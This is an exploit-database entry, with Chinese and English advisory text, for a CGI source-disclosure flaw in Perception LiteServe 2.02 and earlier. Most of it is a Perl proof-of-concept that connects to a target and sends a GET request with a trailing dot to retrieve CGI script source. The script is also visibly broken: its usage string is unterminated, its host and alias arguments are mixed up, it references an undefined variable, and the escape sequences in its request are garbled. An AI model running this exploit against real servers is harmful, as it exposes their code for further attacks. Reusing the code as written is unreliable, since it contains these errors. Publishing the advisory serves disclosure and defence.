https://www.exploit-db.com/exploits/22020
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-262

PerceptionLiteServe是一款集成HTTP、FTP、SMTP、POP3和TELNET服务的系统。其中HTTP服务支持CGI接口。Win32平台下的HTTP服务程序处理文件名存在问题，远程攻击者可以利用这个漏洞获得CGI脚本源代码信息。Win32平台下的LiteServeHTTP服务程序对于特殊文件名处理不正确，攻击者提交带有’.’结尾的文件名请求，可导致服务程序返回CGI脚本的源代码信息给攻击者。造成敏感信息泄露，攻击者可以利用此信息进一步对系统进行攻击。

source: http://www.securityfocus.com/bid/6188/info

By constructing a malicious web request, it is possible for a remote attacker to disclose the source code of CGI scripts. Information gained through exploiting this issue may aid an attacker in launching further attacks against the target system.

#!/usr/bin/perl
#
# LS_FETCH.PL
# By Matthew Murphy
# LiteServe 2.02 and prior - CGI Disclosure
# Usage: perl ls_fetch.pl [filename] [host] [alias] [port]
use IO::Socket;
use URI::Escape;

$alias = "cgi-isapi"; # Default LiteServe CGI alias
$port = 80;
if (@ARGV < 2 || @ARGV > 4) {
print STDOUT "Usage: perl $0 [filename] [host] [alias=cgi-isapi] [port=80]
} else {
if (@ARGV >= 3) {
$alias = $ARGV[2];
}
if (@ARGV == 4) {
$port = $ARGV[3];
}
$filename = $ARGV[1];
$host = $ARGV[2];
$f = IO::Socket::INET->new(PeerAddr=>$host,PeerPort=>$port,Proto=>"tcp");
$f->autoflush(1);
$b = sprintf("GET /%s/%s. HTTP/1.0rnrn", $alias, uri_escape($file));
print $f $b;
while (defined($line=<$f>)) {
print STDOUT $line;
}
undef $f;
}

来源:XF
名称:liteserve-script-source-disclosure(10635)
链接:http://www.iss.net/security_center/static/10635.php
来源:BID
名称:6188
链接:http://www.securityfocus.com/bid/6188
来源:VULNWATCH
名称:20021114PerceptionLiteServeHTTPCGIDisclosureVulnerability
链接:http://archives.neohapsis.com/archives/vulnwatch/2002-q4/0074.html
来源：NSFOCUS
名称：3843
链接：http://www.nsfocus.net/vulndb/3843